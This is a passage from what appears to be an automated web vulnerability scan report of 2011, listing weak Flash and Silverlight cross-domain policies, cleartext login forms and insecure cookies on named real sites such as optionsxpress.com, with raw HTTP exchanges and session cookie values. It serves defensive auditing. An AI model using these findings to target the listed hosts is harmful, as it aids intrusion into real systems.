Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: us.rd.yahoo.com

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:45:18 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 04 Aug 2006 08:27:42 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.24. http://www.adobe.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.adobe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adobe.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 12 Jan 2011 18:55:31 GMT
ETag: "144-bec64ec0"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Wed, 07 Sep 2011 20:18:10 GMT
Keep-Alive: timeout=5, max=500
Content-Type: text/x-cross-domain-policy
Connection: close
Date: Thu, 08 Sep 2011 19:46:58 GMT
Age: 191
Content-Length: 324

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="by-content-type"/>
   <allow-access-from domain="*.macromedia.com" />
   <allow-access-from domain="*.adobe.com" />
   <allow-access-from domain="*.photoshop.com" />
   <allow-access-from domain="*.acrobat.com" />
...[SNIP]...

3.25. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.55.4.40
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

3.26. http://www.nasdaqtrader.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nasdaqtrader.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nasdaqtrader.com

Response

HTTP/1.1 200 OK
Content-Length: 478
Content-Type: text/xml
Content-Location: http://www.nasdaqtrader.com/crossdomain.xml
Last-Modified: Wed, 14 Oct 2009 18:11:02 GMT
Accept-Ranges: bytes
ETag: "e0afa2b0f94cca1:2e7f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 08 Sep 2011 19:46:51 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.nasdaqtrader.com" secure="false" />
   <allow-access-from domain="*.nasdaqtrader.com" secure="true" />
<allow-access-from domain="*.nasdaqomxtrader.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nasdaqomxtrader.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.nasdaqworkstation.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nasdaqworkstation.com" secure="true" />
...[SNIP]...

3.27. http://www.thefinancials.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thefinancials.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thefinancials.com

Response

HTTP/1.1 200 OK
Content-Length: 632
Content-Type: text/xml
Last-Modified: Thu, 07 Jul 2011 21:14:58 GMT
Accept-Ranges: bytes
ETag: "c03d51edea3ccc1:790"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 08 Sep 2011 19:25:08 GMT
Connection: close

<?xml version="1.0"?>    
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.doubleclick.com" />    
<allow-access-from domain="*.doubleclick.net" />    
<allow-access-from domain="*.dartmotif.com" />    
<allow-access-from domain="*.2mdn.net" />    
<allow-access-from domain="*.pureinvestment.net" />    
<allow-access-from domain="*.buzinessware.com" />    
<allow-access-from domain="*.nationalgoldgroup.com" />
<allow-access-from domain="*.rfdevsite.com" />
<allow-access-from domain="*.jpmorganglobal.com" />
...[SNIP]...

3.28. http://www.youtube.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 03 Jun 2011 20:25:01 GMT
Date: Thu, 08 Sep 2011 19:46:53 GMT
Expires: Thu, 08 Sep 2011 19:46:53 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

3.29. https://account.optionsxpress.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: account.optionsxpress.com

Response

HTTP/1.1 200 OK
Content-Length: 771
Content-Type: text/xml
Last-Modified: Mon, 18 Jul 2011 16:07:35 GMT
Accept-Ranges: bytes
ETag: "15d87cf6445cc1:e65"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=8C6E114D48C6D550A47B7E8C7FE7E0AE; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:22 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="optionsxpress.com"/>
   <allow-access-from domain="www.optionsxpress.com"/>
   <allow-access-from domain="oxint.optionsxpress.com"/>
...[SNIP]...
<allow-access-from domain="www.optionsxpress.ca"/>
   <allow-access-from domain="ox.design.optionsxpress.com"/>
   <allow-access-from domain="plr.design.optionsxpress.com"/>
   <allow-access-from domain="10.12.137.51"/>
   <allow-access-from domain="mouaweb1"/>
   <allow-access-from domain="mouabx1"/>
   <allow-access-from domain="mouawebau1"/>
   <allow-access-from domain="mouaint1"/>
...[SNIP]...

3.30. https://docs.google.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://docs.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: docs.google.com

Response

HTTP/1.0 200 OK
Expires: Fri, 09 Sep 2011 11:34:32 GMT
Date: Thu, 08 Sep 2011 11:34:32 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 29546

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="video.google.com" /><allow-access-from domain="s.ytimg.com" />
...[SNIP]...

3.31. http://pfgbest.app5.hubspot.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pfgbest.app5.hubspot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pfgbest.app5.hubspot.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Wed, 17 Oct 2007 22:47:20 GMT
Accept-Ranges: bytes
ETag: "04cb8acf11c81:111fc"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Thu, 08 Sep 2011 20:05:41 GMT
Connection: close

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
- <cross-domain-policy>
<allow-access-from domain="www.bluemedia.com" secure="true" />
</cross-domain-p
...[SNIP]...

3.32. http://stats.manticoretechnology.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.manticoretechnology.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: stats.manticoretechnology.com

Response

HTTP/1.1 200 OK
Content-Length: 266
Content-Type: text/xml
Last-Modified: Mon, 29 Sep 2008 15:46:03 GMT
Accept-Ranges: bytes
ETag: "8074787a4a22c91:651"
Server: Microsoft-IIS/6.0
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" policyref="/w3c/p3p.xml"
X-Powered-By: ASP.NET
Date: Thu, 08 Sep 2011 19:26:24 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="aetnafeds.jellyvision.com" />
<allow-access-from domain="staging.aetnafeds.jellyvision.com" />
<allow-access-from domain="sandbox.aetnafeds.jellyvision.com" />
...[SNIP]...

3.33. http://www.optionsxpress.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.optionsxpress.com

Response

HTTP/1.1 200 OK
Content-Length: 771
Content-Type: text/xml
Last-Modified: Mon, 18 Jul 2011 16:07:35 GMT
Accept-Ranges: bytes
ETag: "15d87cf6445cc1:11f7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=536F72C044CD5B46AABFEAA014EA70D3; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:39 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="optionsxpress.com"/>
   <al
...[SNIP]...
<allow-access-from domain="oxint.optionsxpress.com"/>
...[SNIP]...
<allow-access-from domain="www.optionsxpress.ca"/>
   <allow-access-from domain="ox.design.optionsxpress.com"/>
   <allow-access-from domain="plr.design.optionsxpress.com"/>
   <allow-access-from domain="10.12.137.51"/>
   <allow-access-from domain="mouaweb1"/>
   <allow-access-from domain="mouabx1"/>
   <allow-access-from domain="mouawebau1"/>
   <allow-access-from domain="mouaint1"/>
...[SNIP]...

4. Silverlight cross-domain policy  previous  next
There are 2 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://contentcafe2.btol.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://contentcafe2.btol.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: contentcafe2.btol.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 07 Jul 2010 15:44:32 GMT
Accept-Ranges: bytes
ETag: "3d984d4beb1dcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 08 Sep 2011 20:00:16 GMT
Connection: close
Content-Length: 313

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*"/>
           </allow-from>
           <grant-to>
               <reso
...[SNIP]...

4.2. http://stats.optionsxpress.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.optionsxpress.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: stats.optionsxpress.com

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:24:49 GMT
Server: Omniture DC/2.0.0
xserver: www399
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5. Cleartext submission of password  previous  next
There are 2 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


5.1. http://webstation.barchart.com/eflogin.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webstation.barchart.com
Path:   /eflogin.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /eflogin.php HTTP/1.1
Host: webstation.barchart.com
Proxy-Connection: keep-alive
Referer: http://www.efutures.com/services/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:34:29 GMT
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.3
Expires: 0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3414
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript" type="text/javascript" src="js/DetectEnv.js"></sc
...[SNIP]...
<div id="main" >
<form action="eflogin.php" method="post">
<div id="divLogin" style="background-color: #FFFFFF; border: 2px solid #336699; height: 330px; position: absolute; width: 438px; font: 12px verdana; top: 0px;">
...[SNIP]...
</span>
<input type="password" id="txtPassword" name="txtPassword" value="" style="left: 100px; position: absolute; top: 120px; width: 150px; background-color: #eaeaea;" />
<input type="submit" value="Login" style="left: 112px; position: absolute; top: 150px; width: 50px;" />
...[SNIP]...

5.2. http://www.futurestrading.com/log-in.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.futurestrading.com
Path:   /log-in.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /log-in.html HTTP/1.1
Host: www.futurestrading.com
Proxy-Connection: keep-alive
Referer: http://www.futurestrading.com/managed-accounts/what-are-managed-futures.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: af954db55ff4d54a88e086fc2a1751f0=f7f0571d6de3a89fad76557c5546f2e6; __utma=221442575.134975660.1315527952.1315527952.1315530024.2; __utmb=221442575.1.10.1315530024; __utmc=221442575; __utmz=221442575.1315530024.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=futures%20trading

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:59:51 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Thu, 08 Sep 2011 19:59:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 31326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb">
<head>
<meta h
...[SNIP]...
<div id="content_inner" >
   

   <form action="/log-in.html" method="post" name="com-login" id="com-form-login">
<table width="100%" border="0" align="center" cellpadding="4" cellspacing="0" class="contentpane">
...[SNIP]...
<br />
       <input type="password" id="passwd" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6. SSL cookie without secure flag set  previous  next
There are 54 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


6.1. https://www.optionsxpress.com/new_account.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.optionsxpress.com
Path:   /new_account.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new_account.asp?intcmp=lp_sales_futures HTTP/1.1
Host: www.optionsxpress.com
Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; CMPID=gsus23305007; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; TLTHID=3DAC4327436FC1E882AB69BF2C12F5CC; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007

Response

HTTP/1.1 302 Object moved
Date: Thu, 08 Sep 2011 19:25:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
Content-Length: 208
Content-Type: text/html
Expires: Thu, 08 Sep 2011 19:25:16 GMT
Set-Cookie: ASPSESSIONIDQCDSCTCB=DJOPBMDAGLGCJENDBNKKAEHI; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&amp;firm=OX">here</a>.
...[SNIP]...

6.2. https://www.optionsxpress.com/new_account.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.optionsxpress.com
Path:   /new_account.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new_account.asp?intcmp=lp_sales_futures HTTP/1.1
Host: www.optionsxpress.com
Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; CMPID=gsus23305007; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; TLTHID=3DAC4327436FC1E882AB69BF2C12F5CC; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007

Response

HTTP/1.1 302 Object moved
Date: Thu, 08 Sep 2011 19:45:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
Content-Length: 208
Content-Type: text/html
Expires: Thu, 08 Sep 2011 19:45:33 GMT
Set-Cookie: ASPSESSIONIDSAASBSDA=IICGFGHAGIOCHNMHCMJLCMKM; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&amp;firm=OX">here</a>.
...[SNIP]...

6.3. https://www.optionsxpress.com/welcome.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.optionsxpress.com
Path:   /welcome.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /welcome.asp HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Thu, 08 Sep 2011 19:46:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCSTSAQDA=EALHAKIANBNPKJOEIOKNNICO; path=/
Set-Cookie: TLTHID=23D6A57C4BE8F428BC3F1C97DD0273A0; Path=/; Domain=.optionsxpress.com
HostName: DAWEB25
Set-Cookie: TLTCNT=DAWEB250000000000012272
Date: Thu, 08 Sep 2011 19:46:54 GMT
Connection: close


6.4. https://account.optionsxpress.com/OpenAccount/Index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Index

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OpenAccount/Index?intcmp=lp_sales_futures&firm=OX HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
